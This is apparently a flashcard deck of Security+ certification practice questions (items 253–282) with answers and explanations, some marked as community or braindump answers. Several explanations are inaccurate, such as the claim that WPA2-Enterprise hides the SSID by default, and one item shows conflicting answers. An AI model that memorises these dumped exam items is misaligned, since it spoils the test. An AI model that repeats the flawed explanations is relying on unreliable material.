Locator (URL) redirection: This involves changing the URL or using a URL shortener to redirect users to a different site. This is usually done at the URL level rather than manipulating DNS records.

Domain hijacking: This involves taking control of the entire domain registration, allowing the attacker to control DNS settings and web content for that domain. This scenario specifically indicates that only some users (in a different office) are experiencing the issue, which suggests a localized DNS poisoning rather than full domain control.

Therefore, the most likely attack observed is DNS poisoning.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
253
Q

Which of the following in the incident response process is the BEST approach to improve the speed of the identification phase?

a. Activate verbose logging in all critical assets.
b. Tune monitoring in order to reduce false positive rates.
c. Redirect all events to multiple syslog servers.
d. Increase the number of sensors present on the environment.

A

b. Tune monitoring in order to reduce false positive rates.

Explanation:

Tuning monitoring to reduce false positive rates involves configuring monitoring systems to more accurately detect and alert on genuine security incidents while minimizing false alarms.
False positives can slow down the identification phase by diverting attention and resources from genuine incidents.
By fine-tuning monitoring rules and thresholds, security analysts can focus on relevant alerts, leading to quicker identification of potential security incidents.
This approach is generally more effective than simply increasing logging verbosity, redirecting events to multiple syslog servers, or adding more sensors, as those actions may increase data volume without necessarily improving the relevance or accuracy of alerts.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
254
Q

A security administrator is analyzing the corporate wireless network. The network only has two access points running on channels 1 and 11. While using airodump-ng, the administrator notices other access points are running with the same corporate ESSID on all available channels and with the same BSSID of one of the legitimate access points. Which of the following attacks is happening on the corporate network?

a. On-path
b. Evil twin
c. Jamming
d. Rogue access point
e. Disassociation

A

b. Evil Twin attack.

Here’s why:

Evil Twin attack: In this type of attack, a malicious actor sets up a rogue wireless access point (AP) with the same SSID (network name) and often the same BSSID (MAC address) as a legitimate AP in the vicinity. The goal is to trick users and devices into connecting to the rogue AP instead of the legitimate one. Once connected, the attacker can intercept traffic, conduct man-in-the-middle attacks, or lure users into providing sensitive information.

In your case:

The presence of multiple access points with the same ESSID (corporate network name) and the same BSSID as one of the legitimate access points suggests that someone has set up rogue APs to mimic the corporate network.
These rogue APs are likely broadcasting on multiple channels, trying to attract devices across different areas of the wireless spectrum (channels 1 and 11 in your case).
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
255
Q

When implementing automation with IoT devices, which of the following should be considered FIRST to keep the network secure?

a. Z-Wave compatibility
b. Network range
c. Zigbee configuration
d. Communication protocols

A

d. Communication protocols

Here’s why:

IoT devices communicate using various protocols such as Wi-Fi, Bluetooth, Zigbee, Z-Wave, and others. The choice of communication protocol significantly impacts the security and functionality of IoT deployments:

Security Features: Different protocols offer varying levels of security features. For example, Zigbee and Z-Wave are designed with mesh networking capabilities and built-in encryption, which can enhance security compared to protocols like Bluetooth, which may require additional security measures.

Interoperability: Ensuring that IoT devices can communicate securely and effectively with each other and with central management systems often depends on selecting compatible communication protocols.

Network Segmentation: Understanding how these protocols operate and interact with other network components is crucial for proper network segmentation and isolation of IoT devices from critical network resources.

Considering communication protocols first allows you to establish a secure foundation for IoT deployments, addressing encryption, authentication, and interoperability requirements from the outset. Therefore, the correct answer is d. Communication protocols.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
256
Q

An organization is concerned that its hosted web servers are not running the most updated version of the software. Which of the following would work BEST to help identify potential vulnerabilities?

a. hping3 -S comptia-org -p 80
b. nc -l -v comptia.org -p 80
c. nmap comptia.org -p 80 -sV
d. nslookup –port=80 comptia.org

A

c. nmap comptia.org -p 80 -sV.

Here’s why:

nmap is a versatile network scanning tool that can scan hosts for open ports and services.
-p 80 specifies that the scan should target port 80, which is commonly used for HTTP traffic.
-sV enables version detection, which allows nmap to determine the versions of services running on open ports.

By running this command (nmap comptia.org -p 80 -sV), the organization can discover the versions of software running on the web servers hosted at comptia.org. This information is crucial for identifying whether the software versions are up-to-date or if there are known vulnerabilities associated with the detected versions.

Therefore, c. nmap comptia.org -p 80 -sV is the most appropriate choice to help identify potential vulnerabilities related to outdated software versions on the organization’s hosted web servers.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
257
Q

A news article states hackers have been selling access to IoT camera feeds. Which of the following is the MOST likely reason for this issue?

a. Outdated software
b. Weak credentials
c. Lack of encryption
d. Backdoors

A

b. Weak credentials.

Here’s why:

IoT devices, including cameras, are often deployed with default or weak credentials (such as username/password combinations like admin/admin or no password at all). These devices are frequently targeted by attackers who scan the internet for devices with known vulnerabilities. Once they find devices with weak credentials, hackers can gain unauthorized access to them.

Selling access to IoT camera feeds implies that hackers have compromised these devices and are exploiting them for financial gain or malicious purposes. Weak credentials make it easy for attackers to brute-force their way into these devices or exploit default credentials that haven’t been changed by users.

While other factors like a. Outdated software, c. Lack of encryption, and d. Backdoors can also contribute to IoT vulnerabilities, weak credentials remain one of the most exploited weaknesses in IoT security, making it the most likely reason in this scenario. Strengthening credentials by using strong, unique passwords and implementing multi-factor authentication (MFA) can significantly mitigate this risk.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
258
Q

A company wants to build a new website to sell products online. The website will host a storefront application that will allow visitors to add products to a shopping cart and pay for the products using a credit card. Which of the following protocols would be the MOST secure to implement?

a. SSL
b. SFTP
c. SNMP
d. TLS

A

d. TLS (Transport Layer Security).

Here’s why TLS is the best choice:

Encryption: TLS provides encryption of data in transit between the user's browser and the web server. This ensures that sensitive information such as credit card details cannot be intercepted or read by unauthorized parties.

Data Integrity: TLS ensures data integrity, meaning that the data cannot be altered or tampered with while it is being transmitted over the network.

Authentication: TLS supports server authentication, which allows the client (user's browser) to verify the identity of the server it is communicating with. This helps prevent man-in-the-middle attacks where an attacker might impersonate the server.

Compatibility: TLS is widely supported across browsers and devices, making it suitable for ensuring secure communications between clients and servers on the web.

While SSL (Secure Sockets Layer) was its predecessor, TLS has superseded SSL due to various security vulnerabilities found in SSL over time. Therefore, TLS is the current standard for securing web communications and would be the most secure protocol to implement for the new e-commerce website.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
259
Q

An IT manager is estimating the mobile device budget for the upcoming year. Over the last five years, the number of devices that were replaced due to loss, damage, or theft steadily increased by 10%. Which of the following would BEST describe the estimated number of devices to be replaced next year?

a. ALE
b. ARO
c. RPO
d. SLE

A

b. ARO (Annualized Rate of Occurrence).

Here’s why:

Annualized Rate of Occurrence (ARO) refers to the expected frequency with which a loss event (such as device replacement due to loss, damage, or theft) is anticipated to occur in a given year. It is derived from historical data and trends.

In this scenario, the IT manager is using the trend of the past five years, where the number of devices replaced due to loss, damage, or theft increased by 10% annually. This percentage increase provides the ARO for the upcoming year, helping to estimate how many devices may need replacement.

ALE (Annualized Loss Expectancy) is related but calculates the expected monetary loss from the occurrence of such events over a year, factoring in the cost of each incident and the ARO.

RPO (Recovery Point Objective) and SLE (Single Loss Expectancy) are terms typically associated with disaster recovery and risk management, focusing on data loss scenarios rather than physical device replacement.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
260
Q

An organization is repairing the damage after an incident. Which of the following controls is being implemented?

a. Detective
b. Preventive
c. Corrective
d. Compensating

A

c. Corrective.

Corrective controls are implemented after an incident has occurred to mitigate the impact or restore affected systems and data to their normal operational state. These controls aim to fix the root cause of the incident and prevent its recurrence.

Detective controls are used to detect and identify incidents or anomalies as they occur or shortly after.

Preventive controls are implemented to prevent incidents from occurring in the first place.

Compensating controls are alternative measures implemented when an original control cannot be applied effectively.

In the context of repairing damage after an incident, the organization is actively addressing the consequences and remedying the situation, which aligns with corrective controls.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
261
Q

A Chief Executive Officer’s (CEO) personal information was stolen in a social-engineering attack. Which of the following sources would reveal if the CEO’s personal information is for sale?

a. Automated information sharing
b. Open-source intelligence
c. The dark web
d. Vulnerability databases

A

c. The dark web.

The dark web is a part of the internet that is not indexed by traditional search engines and is often used for illicit activities, including the sale of stolen personal information.
Open-source intelligence (OSINT) can also be used to gather information from publicly available sources, but it typically focuses on publicly accessible data rather than illicit activities.
Automated information sharing and vulnerability databases are more related to technical information sharing and security vulnerabilities, rather than the sale of personal information.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
262
Q

Which of the following typically uses a combination of human and artificial intelligence to analyze event data and take action without intervention?

a. TTP
b. OSINT
c. SOAR
d. SIEM

A

c. SOAR (Security Orchestration, Automation, and Response).

SOAR platforms integrate security orchestration, automation, and response capabilities to automate incident response workflows.
They utilize a combination of human and artificial intelligence (AI) to analyze event data, automate repetitive tasks, and orchestrate responses to security incidents.

TTP (Tactics, Techniques, and Procedures) refer to the behavior and actions of threat actors.
OSINT (Open-Source Intelligence) refers to intelligence collected from publicly available sources.
SIEM (Security Information and Event Management) systems collect, correlate, and analyze security event data but typically require human intervention for action.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
263
Q

A security analyst has been tasked with creating a new WiFi network for the company. The requirements received by the analyst are as follows:

-Must be able to differentiate between users connected to WiFi
-The encryption keys need to change routinely without interrupting the users or forcing reauthentication
-Must be able to integrate with RADIUS
-Must not have any open SSIDs

Which of the following options BEST accommodates these requirements?

a. WPA2-Enterprise
b. WPA3-PSK
c. 802.11n
d. WPS

A

a. WPA2-Enterprise

Here’s how WPA2-Enterprise aligns with each requirement:

Must be able to differentiate between users connected to WiFi:
WPA2-Enterprise uses 802.1X authentication, which allows for individual user authentication through a RADIUS server. Each user has unique credentials, enabling differentiation.

The encryption keys need to change routinely without interrupting the users or forcing reauthentication:
WPA2-Enterprise supports dynamic key exchange using protocols like EAP-TLS or PEAP, which allows for frequent key rotation without requiring users to reauthenticate.

Must be able to integrate with RADIUS:
WPA2-Enterprise is designed to work with a RADIUS server for centralized authentication, authorization, and accounting.

Must not have any open SSIDs:
WPA2-Enterprise does not require an open SSID; it operates with a closed (hidden) SSID by default, enhancing security.

Therefore, WPA2-Enterprise is the most suitable choice that meets all the specified requirements effectively.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
264
Q

A security administrator is trying to determine whether a server is vulnerable to a range of attacks. After using a tool, the administrator obtains the following output:

HTTP/1.0 200 OK
Content-Type: text/html
Server: Apache

root:s9fyf983#:0:1)System Operator:/:/bin/bash
daemon:*:1:1::/tmp:
user1:f1@su3FF:183.100:user:/home/users/user1:/bin/bash

Which of the following attacks was successfully implemented based on the output?

a. Memory leak
b. Race conditions
c. SQL injection
d. Directory traversal

A

d. Directory traversal

Directory traversal attacks exploit insufficient input validation in web applications to access directories and files outside the intended directory. In this scenario, sensitive information such as user credentials (root, daemon, user1) and their associated details (/bin/bash) are disclosed, indicating a potential vulnerability allowing unauthorized access to system files.

Memory leak: This involves unintended memory access that can lead to unauthorized data disclosure, but the provided output does not directly indicate a memory leak.

Race conditions: These occur when the outcome of a process depends on the timing of other uncontrollable events. The output does not indicate race conditions.

SQL injection: This attack targets databases by injecting malicious SQL code into queries, but the output does not show SQL-related errors or database content.

Directory traversal: This attack exploits insufficient input validation in web applications to access directories and files outside the intended directory.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
265
Q

A Chief Security Officer is looking for a solution that can reduce the occurrence of customers receiving errors from back-end infrastructure when systems go offline unexpectedly. The security architect would like the solution to help maintain session persistence. Which of the following would BEST meet the requirements?

a. Reverse proxy
b. NIC teaming
c. Load balancer
d. Forward proxy

A

c. Load balancer

Load balancers distribute incoming network traffic across multiple servers to ensure no single server gets overwhelmed, thereby reducing the impact of server outages. They also help maintain session persistence by ensuring that once a client establishes a session with a server, subsequent requests from that client are routed back to the same server. This prevents disruptions in user sessions even if individual servers go offline or are taken out of service temporarily.

a. Reverse proxy:

A reverse proxy is used to handle incoming client requests and distribute them to the appropriate backend servers. While it can help with load distribution and offloading certain tasks from servers, it does not inherently provide session persistence across servers during outages. It focuses more on routing and enhancing security rather than maintaining session state.

b. NIC teaming:

NIC teaming (or network interface card teaming) involves combining multiple network interfaces into a single logical interface to increase bandwidth and redundancy. However, it primarily deals with network interface redundancy and load balancing at the network level, not at the application level where session persistence is managed.

d. Forward proxy:

A forward proxy is used to retrieve data from other servers on behalf of a client. It does not provide load balancing or session persistence features for backend infrastructure. Its primary role is to enhance security and control outbound traffic from clients within a network.

(Braindump: a. Reverse proxy )

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
266
Q

Which of the following should an organization consider implementing in the event executives need to speak to the media after a publicized data breach?

a. Incident response plan
b. Business continuity plan
c. Communication plan
d. Disaster recovery plan

A

c. Communication plan

Explanation:

When executives need to speak to the media after a publicized data breach, it’s crucial to have a well-defined communication plan in place. A communication plan outlines how information about the incident will be communicated both internally and externally, including to the media, customers, stakeholders, and the public. It ensures that messaging is consistent, accurate, and timely, helping to manage the organization’s reputation and maintain public trust during a crisis.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
267
Q

A well-known organization has been experiencing attacks from APTs. The organization is concerned that custom malware is being created and emailed into the company or installed on USB sticks that are dropped in parking lots. Which of the following is the BEST defense against this scenario?

a. Configuring signature-based antivirus to update every 30 minutes
b. Enforcing S/MIME for email and automatically encrypting USB drives upon insertion
c. Implementing application execution in a sandbox for unknown software
d. Fuzzing new files for vulnerabilities if they are not digitally signed

A

c. Implementing application execution in a sandbox for unknown software.

Explanation:

Sandboxing: This technique involves running potentially risky or unknown software in an isolated environment (sandbox) where its behavior can be observed without affecting the rest of the system. Sandboxing helps prevent malware from spreading or causing harm by containing its activities within a controlled environment.

Email and USB Defense: While options like configuring antivirus to update frequently (option a) and using encryption (option b) are beneficial, they do not directly mitigate the risk of custom malware that may evade signature-based detection or encryption measures. Sandboxing, on the other hand, focuses on behavior analysis, which is crucial for detecting and containing new and unknown threats, such as custom malware.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
268
Q

A company is implementing BYOD and wants to ensure all users have access to the same cloud-based services. Which of the following would BEST allow the company to meet this requirement?

a. IaaS
b. PaaS
c. MaaS
d. SaaS

A

d. SaaS (Software as a Service).

Explanation:

SaaS (Software as a Service): This cloud computing model allows users to access software applications that are hosted and maintained by a third-party provider via the internet. Users can access these applications from any device with an internet connection, making it ideal for a BYOD environment where users bring their own devices. SaaS applications ensure consistency in service access across different devices and platforms, as the applications are centrally managed and accessed through a web browser or client application.

Other Options:
    IaaS (Infrastructure as a Service): Provides virtualized computing resources over the internet, such as virtual machines and storage, but does not directly address application access consistency.
    PaaS (Platform as a Service): Provides a platform allowing customers to develop, run, and manage applications without the complexity of building and maintaining the underlying infrastructure. While it supports application development and deployment, it does not necessarily ensure uniform access to third-party SaaS applications.
    MaaS (Mobile as a Service): Generally refers to mobile device management services, which focus on managing mobile devices, apps, and content, but do not directly provide uniform access to cloud-based services.

Therefore, SaaS is the most suitable option for ensuring consistent access to cloud-based services across various devices in a BYOD environment.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
269
Q

During a recent security incident at a multinational corporation a security analyst found the following logs for an account called user:

Account Login location Time (UTC) Message
user New York 9:00 am Login: user, successful
user Lost Angeles 9:01 am Login: user, successful
user Sao Paolo 9:05 am Login: user, successful
user Munich 9:12 am Login: user, successful

Which of the following account policies would BEST prevent attackers from logging in as user?

a. Impossible travel time
b. Geofencing
c. Time-based logins
d. Geolocation

A

a. Impossible travel time

Here’s why:

Impossible travel time: This policy detects and prevents logins from locations that are geographically too far apart to be possible within a given timeframe. In this case, the logins from New York, Los Angeles, Sao Paulo, and Munich all occurring within minutes of each other indicate a clear case of impossible travel time. Implementing this policy would block such suspicious login attempts based on the unrealistic travel times between the locations.

Let’s briefly review the other options:

Geofencing: Geofencing restricts access based on predefined geographic boundaries. While this can be effective for limiting logins to certain locations, it wouldn't specifically address the issue of multiple, simultaneous logins from different locations.

Time-based logins: This policy restricts logins to certain times of the day. While it can enhance security, it wouldn't prevent logins from different locations in quick succession unless those times were also unrealistic for travel.

Geolocation: Geolocation tracks the physical location from which a login attempt is made and can be used to enhance security by verifying if the login location is typical for the user. However, it does not specifically address the scenario of multiple rapid logins from different locations unless combined with an impossible travel time check.

Therefore, the impossible travel time policy is the most appropriate and effective in preventing the kind of suspicious login activity described in the logs.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
270
Q

An organization is tuning SIEM rules based off of threat intelligence reports. Which of the following phases of the incident response process does this scenario represent?

a. Lessons learned
b. Eradication
c. Recovery
d. Preparation

A

d. Preparation.

Explanation:

Preparation in the incident response process involves activities such as enhancing monitoring and detection capabilities, which includes tuning SIEM rules based on threat intelligence. By leveraging threat intelligence reports, organizations can proactively adjust their detection mechanisms (such as SIEM rules) to better identify and respond to potential threats.

This phase focuses on readiness and involves actions taken before an incident occurs to improve the organization's ability to detect, respond to, and recover from security incidents effectively.

Other Options Explained:

Lessons learned: This phase occurs after an incident has been resolved, where the organization conducts a retrospective analysis to identify what went well and what could be improved in handling similar incidents in the future.

Eradication: This phase involves the removal of threats from affected systems and networks during an active incident response process.

Recovery: This phase follows eradication and involves restoring affected systems and data to normal operation after an incident.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
271
Q

The database administration team is requesting guidance for a secure solution that will ensure confidentiality of cardholder data at rest only in certain fields in the database schema. The requirement is to substitute a sensitive data field with a non-sensitive field that is rendered useless if a data breach occurs. Which of the following is the BEST solution to meet the requirement?

a. Tokenization
b. Masking
c. Full disk encryption
d. Mirroring

A

a. Tokenization

Tokenization is a data security technique that replaces sensitive data with non-sensitive placeholders called tokens. These tokens are randomly generated and are mapped to the original sensitive data through a tokenization system. If a data breach occurs and the database is compromised, the tokens alone are useless without the corresponding tokenization system to decrypt them back into meaningful data. This approach ensures that sensitive cardholder data remains protected and unusable to unauthorized parties.

Why Tokenization is the Best Choice:

Confidentiality: Tokenization maintains the confidentiality of sensitive data by replacing it with tokens that have no exploitable value.

Usefulness in Breach Scenarios: In the event of a data breach, even if the database is compromised, the tokens cannot be reverse-engineered back into the original sensitive data without access to the tokenization system.

Specific Field Encryption: Tokenization allows for selective substitution of sensitive fields in the database schema while maintaining the integrity and relational aspects of the data.

Other Options Explained:

Masking: While masking hides sensitive data by partially or fully replacing it with characters (such as asterisks), it does not render the data useless in a breach scenario as the original data format remains discernible through reverse engineering.

Full Disk Encryption: This encrypts all data on the disk or storage device, but it does not selectively protect specific fields within a database schema. It protects against physical theft or unauthorized access to the storage device itself rather than individual data fields.

Mirroring: This is a technique used for redundancy and fault tolerance, ensuring data availability and recovery but does not directly address confidentiality or substitution of sensitive data fields.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
272
Q

A company’s security team received notice of a critical vulnerability affecting a high-profile device within the web infrastructure. The vendor patch was just made available online but has not yet been regression tested in development environments. In the interim, firewall rules were implemented to reduce the access to the interface affected by the vulnerability. Which of the following controls does this scenario describe?

a. Deterrent
b. Compensating
c. Detective
d. Preventive

A

b. compensating controls.

Compensating controls are security measures put in place to compensate for the lack of or the inadequacy of other controls. In this case:

Vendor Patch Availability: A critical vulnerability has been identified, and the vendor has released a patch, but it has not yet been tested in development environments.

Implementation of Firewall Rules: To mitigate the risk posed by the vulnerability while awaiting the tested patch, firewall rules are deployed. These rules restrict access to the vulnerable interface, thereby reducing the attack surface and the likelihood of exploitation.

By implementing firewall rules, the security team is applying a compensating control to temporarily mitigate the risk associated with the unpatched vulnerability. This approach helps to maintain a level of security until the proper patching process can be completed, ensuring that the organization’s systems are protected from potential exploitation. Therefore, the correct answer is:

b. Compensating

This control supplements the existing security measures until a more comprehensive solution (in this case, a properly tested vendor patch) can be safely deployed

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
273
Q

A security analyst is reviewing the following command-line output:

Internet Address Physical Address Type
192.168.1.1 aa-bb-cc-00-11-22 dynamic
192.168.1.2 aa-bb-cc-00-11-22 dynamic
192.168.1.3 aa-bb-cc-00-11-22 dynamic
192.168.1.4 aa-bb-cc-00-11-22 dynamic
192.168.1.5 aa-bb-cc-00-11-22 dynamic
—output omittedd—
192.168.1.251 aa-bb-cc-00-11-22 dynamic
192.168.1.252 aa-bb-cc-00-11-22 dynamic
192.168.1.253 aa-bb-cc-00-11-22 dynamic
192.168.1.254 aa-bb-cc-00-11-22 dynamic
192.168.1.255 ff-ff-ff-ff-ff-ff static

Which of the following is the analyst observing?

a. ICMP spoofing
b. URL redirection
c. MAC address cloning
d. DNS poisoning

A

c. MAC address cloning.

MAC address cloning occurs when a device impersonates another by using its MAC address. In this case, all dynamically assigned IP addresses (192.168.1.1 to 192.168.1.254) are associated with the same MAC address (“aa-bb-cc-00-11-22”), suggesting that multiple devices are using the same MAC address, which is abnormal and could indicate a security issue or misconfiguration.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
274
Q

A company was recently breached, Part of the company’s new cybersecurity strategy is to centralize the logs from all security devices. Which of the following components forwards the logs to a central source?

a. Log enrichment
b. Log aggregation
c. Log parser
d. Log collector

A

(Community D 92%)
d. Log collector

A log collector gathers logs from multiple sources, such as firewalls, intrusion detection systems (IDS), servers, and other network devices. It then forwards these logs to a centralized location, typically a SIEM (Security Information and Event Management) system or a log management server. This centralized collection allows for efficient monitoring, analysis, and correlation of security events across the organization’s IT infrastructure.

a. Log enrichment: Log enrichment involves enhancing the raw log data with additional contextual information to make it more meaningful and actionable. This could include adding geolocation data, user information, or categorizing logs based on severity levels.

b. Log aggregation: Log aggregation refers to the process of collecting and consolidating log data from various sources into a centralized repository. It involves gathering logs from multiple devices or systems to facilitate centralized storage and analysis.

c. Log parser: A log parser is a tool or component that interprets and extracts relevant information from raw log data. It parses the logs to identify key fields and normalize them into a structured format that can be further processed or analyzed.

In the context of the question, while all these components are important for managing and analyzing logs, d. Log collector specifically addresses the task of gathering logs from distributed sources and forwarding them to a centralized location. This centralization is crucial for effective monitoring and management of security events across the organization.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
275
Q

Which of the following is the MOST likely reason for securing an air-gapped laboratory HVAC system?

a. To avoid data leakage
b. To protect surveillance logs
c. To ensure availability
d. To facilitate third-party access

A

a. To avoid data leakage

Air-gapping a system means physically isolating it from other networks that could potentially be accessed by unauthorized parties. In the context of a laboratory HVAC system, securing it with an air gap helps prevent sensitive data, such as environmental control settings or operational data, from leaking to unauthorized individuals or systems. This isolation reduces the risk of data breaches or unauthorized access attempts.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
276
Q

A user forwarded a suspicious email to the security team. Upon investigation, a malicious URL was discovered. Which of the following should be done FIRST to prevent other users from accessing the malicious URL?

a. Configure the web content filter for the web address.
b. Report the website to threat intelligence partners.
c. Set the SIEM to alert for any activity to the web address.
d. Send out a corporate communication to warn all users of the malicious email.

A

a. Configure the web content filter for the web address.

Configuring the web content filter to block access to the malicious URL ensures that users within the organization are protected immediately. By adding the URL to the web content filter’s blacklist, access attempts to the malicious site can be intercepted and blocked at the network level, thereby preventing potential infections or further compromise.

The other options are also important actions but would typically follow after the immediate mitigation of blocking the URL:

b. Report the website to threat intelligence partners: This is important for broader industry awareness and potential mitigation efforts but doesn't directly prevent access for internal users.

c. Set the SIEM to alert for any activity to the web address: This helps in monitoring and detecting if any user attempts to access the URL after it has been blocked.

d. Send out a corporate communication to warn all users of the malicious email: This is crucial for awareness and educating users about the threat, but it doesn't immediately prevent access to the URL.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
277
Q

A systems analyst is responsible for generating a new digital forensics chain-of-custody form. Which of the following should the analyst include in this documentation? (Choose two.)

a. The order of volatility
b. A CRC32 checksum
c. The provenance of the artifacts
d. The vendor’s name
e. The date and time
f. A warning banner

A

(Community CE 86%)
c. The provenance of the artifacts
e. The date and time

These elements are essential for ensuring a clear and traceable record of the evidence handling process.

c. The provenance of the artifacts: This includes details on where the evidence was collected, who collected it, and how it has been handled. This information is crucial for establishing the authenticity and integrity of the evidence.

e. The date and time: This provides a timestamp for when the evidence was collected or transferred, which is critical for establishing a timeline of events and maintaining the integrity of the chain-of-custody.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
278
Q

An organization is migrating several SaaS applications that support SSO. The security manager wants to ensure the migration is completed securely. Which of the following application integration aspects should the organization consider before focusing into underlying implementation details? (Choose two.)

a. The back-end directory source
b. The identity federation protocol
c. The hashing method
d. The encryption method
e. The registration authority
f. The certificate authority

A

a. The back-end directory source
b. The identity federation protocol

These aspects are critical for ensuring secure and seamless integration of the applications with the SSO infrastructure.

a. The back-end directory source: This is important to determine how user identities and credentials are managed and stored. It ensures compatibility and secure communication between the SSO system and the SaaS applications.

b. The identity federation protocol: This defines how authentication and authorization data are exchanged between the SSO system and the SaaS applications. Common protocols include SAML, OAuth, and OpenID Connect, and choosing the right protocol is essential for secure and efficient integration.

By focusing on these two aspects, the organization can ensure a secure and interoperable SSO implementation for the migrated SaaS applications.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
279
Q

A security analyst has been tasked with finding the maximum amount of data loss that can occur before ongoing business operations would be impacted. Which of the following terms BEST defines this metric?

a. MTTR
b. RTO
c. RPO
d. MTBF

A

c. RPO (Recovery Point Objective)

RPO (Recovery Point Objective): This metric specifies the maximum acceptable amount of data loss measured in time. It represents the point in time to which data must be recovered to resume normal business operations after a disruption. The RPO determines how often backups should be made to ensure that data can be restored to an acceptable state in the event of a data loss incident.

MTTR (Mean Time to Repair):

Definition: The average time required to repair a system or component and restore it to normal operation after a failure.
Usage: MTTR focuses on the efficiency and speed of the repair process, not on the amount of data loss or backup frequency.

RTO (Recovery Time Objective):

Definition: The maximum acceptable amount of time that a system, application, or function can be down after a failure or disaster before there is an unacceptable impact on business operations.
Usage: RTO is about the duration of downtime that can be tolerated, not about data loss or how recent the data needs to be.

MTBF (Mean Time Between Failures):

Definition: The average time between failures of a system or component.
Usage: MTBF is used to predict the reliability and lifespan of systems, indicating how frequently failures might occur, but it does not directly relate to data loss or recovery objectives.

In summary:

RPO focuses on the maximum acceptable data loss.
RTO focuses on the maximum acceptable downtime.
MTTR focuses on the average time to repair and restore.
MTBF focuses on the average time between failures.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
280
Q

The IT department’s on-site developer has been with the team for many years. Each time an application is released, the security team is able to identify multiple vulnerabilities. Which of the following would BEST help the team ensure the application is ready to be released to production?

a. Limit the use of third-party libraries.
b. Prevent data exposure queries.
c. Obfuscate the source code.
d. Submit the application to QA before releasing it.

A

d. Submit the application to QA before releasing it.
Explanation:

Quality Assurance (QA):

Purpose: QA teams are responsible for systematically testing the application to identify and fix bugs, vulnerabilities, and other issues before the application is released to production. This includes performing various types of testing such as functional testing, performance testing, and security testing.
Benefit: Submitting the application to QA ensures that it undergoes a thorough review process, which can catch issues that the development team might have missed. This step is crucial for improving the overall quality and security of the application.

Why Other Options Are Less Effective:

a. Limit the use of third-party libraries:

While limiting third-party libraries can reduce the attack surface and dependencies, it doesn't directly address the specific vulnerabilities in the application code written by the developer.

b. Prevent data exposure queries:

Preventing data exposure queries is a good practice to protect sensitive data, but it is just one aspect of security and doesn't cover all possible vulnerabilities in the application.

c. Obfuscate the source code:

Obfuscation can make it harder for attackers to understand the code, but it doesn't eliminate vulnerabilities. It is more of a deterrent than a solution for improving the quality or security of the code.

Summary:

Submitting the application to a dedicated QA team for thorough testing is the most effective way to ensure that it is ready for production. QA teams can perform comprehensive testing, including security testing, which will help identify and resolve vulnerabilities before the application is released.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
281
Q

During a security incident investigation, an analyst consults the company’s SIEM and sees an event concerning high traffic to a known, malicious command-and-control server. The analyst would like to determine the number of company workstations that may be impacted by this issue. Which of the following can provide this information?

a. WAF logs
b. DNS logs
c. System logs
d. Application logs

A

(Community B 80%, C 20%)

DNS logs can contain a record for every query and response. It can show the IP addresses and domain names that your system should/shouldn’t be communicating with, it can reveal malware calling out to its command-and-control server, or data transfers to non-company locations. This is one of the reasons why DNS logs are some of the most valuable logs to import into a SIEM system

(Brain dump)
b. DNS logs
Explanation:

DNS Logs:

Purpose: DNS logs record queries made by workstations to resolve domain names to IP addresses.
Benefit: By reviewing DNS logs, the analyst can identify which workstations have attempted to resolve the domain name of the command-and-control server. This helps in determining which workstations have potentially communicated with the malicious server.

Why Other Options Are Less Effective:

a. WAF logs:

Purpose: Web Application Firewall (WAF) logs monitor and filter HTTP traffic to and from web applications.
Limitation: While WAF logs can detect malicious web traffic, they are less likely to capture traffic to command-and-control servers unless the traffic involves web applications.

c. System logs:

Purpose: System logs contain information about operating system events such as user logins, system errors, and application events.
Limitation: System logs typically do not track network traffic or DNS queries, making them less useful for identifying communication with a command-and-control server.

d. Application logs:

Purpose: Application logs record events and errors related to specific applications running on the system.
Limitation: Unless the malicious traffic is related to a specific application and that application logs such network activity, these logs are unlikely to provide comprehensive information about which workstations are affected.

Summary:

DNS logs are the most relevant and useful for identifying workstations that have attempted to communicate with a known, malicious command-and-control server. They provide clear evidence of which machines have resolved the server’s domain name, indicating potential infection or compromise.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
282
Q

A company has a flat network that is deployed in the cloud. Security policy states that all production and development servers must be segmented. Which of the following should be used to design the network to meet the security requirements?

a. CASB
b. VPC
c. Perimeter network
d. WAF

A

b. VPC (Virtual Private Cloud)
Explanation:

VPC (Virtual Private Cloud):

Purpose: A VPC allows you to create isolated network segments within a cloud provider's infrastructure.
Benefit: You can create multiple subnets within a VPC and control the traffic between them using network access control lists (ACLs) and security groups. This enables the segmentation of production and development environments, aligning with the security policy.

Why Other Options Are Less Effective:

a. CASB (Cloud Access Security Broker):

Purpose: A CASB provides visibility and control over data and security policies for cloud services.
Limitation: While a CASB enhances security for cloud services, it does not inherently provide network segmentation capabilities required to isolate production and development servers.

c. Perimeter network:

Purpose: A perimeter network, or DMZ (Demilitarized Zone), is used to expose external-facing services to the internet while protecting the internal network.
Limitation: A perimeter network focuses on securing external access rather than internal segmentation between different environments such as production and development.

d. WAF (Web Application Firewall):

Purpose: A WAF protects web applications by filtering and monitoring HTTP traffic.
Limitation: While a WAF is useful for protecting web applications from specific types of attacks, it does not provide the necessary network segmentation to isolate production and development servers.

Summary:

